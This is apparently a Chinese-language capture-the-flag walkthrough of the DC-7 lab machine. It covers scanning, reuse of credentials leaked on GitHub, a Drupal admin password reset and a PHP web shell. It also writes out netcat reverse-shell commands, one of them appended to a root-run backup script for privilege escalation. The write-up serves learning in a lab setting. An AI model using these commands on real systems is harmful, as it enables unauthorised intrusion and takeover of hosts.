DC-7
攻击者kali:192.168.1.11
受害者DC-7:192.168.1.12
通过arp-sacn -l 扫描到DC-7的IP地址
使用namp扫描DC-7
nmap -sS -A -p- 192.168.1.12
发现有22和80端口
访问一下80
打开首页就直接提醒我们暴力破解是没有用的,跳出框外思考
网页右下角有个@DC7USER
百度一下
GitHub有这个
有个项目的源码,点击进去看看
配置文件里的数据库用户名账号正好是dc7user还有数据库的密码
尝试用这个账号连接ssh
连接成功!
提醒我们又封邮箱
查看一下
backups备份的意思,可能是个备份脚本,去查看一下
而且这脚本还是有权限执行的
尝试加提权命令看看
不行,不允许添加
貌似这脚本好像提示着什么
进入到/var/www/html下
drush user-password admin --password="demon"
修改管理员密码
去web页面登录一下
需要去下载php插件
下载好后上传
安装成功
点击Enable newly added modules激活模块
点击前面的三角将前几栏折回,找到PHP Filetr够选
并且点击install
安装成功
这里可以新建内容
尝试写入一句话木马,选着PHP,点击保存
显示页面
复制链接尝试用蚁剑连接看看
连接成功
进入终端反弹shell
kali端先监听
nc -lvnp 4444
蚁剑终端
nc -e /bin/sh 192.168.1.11 4444
打开交互模式
python -c 'import pty;pty.spawn("/bin/bash")'
提权想到之前那个脚本
有权限
kali再监听一个端口
nc -lvnp 6666
将反弹shell写入脚本
echo "nc -e /bin/bash 192.168.1.11 6666" >> /opt/scripts/backups.sh
然后再执行脚本
提权到root
DC-7总结
nmap扫描
注意站点信息,站外信息收集查询,查到GitHub上的源码,发现数据库账号密码
尝试进行ssh远程登录,发现邮箱,发现备份脚本的作用
修改web页面admin账号的密码登录到web界面
安装PHP插件
添加一句话木马php页面
蚁剑连接,shell反弹到kali
打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")'
echo "nc -e /bin/bash 192.168.1.11 6666" >> /opt/scripts/backups.sh
修改备份脚本,并且执行,拿到root权限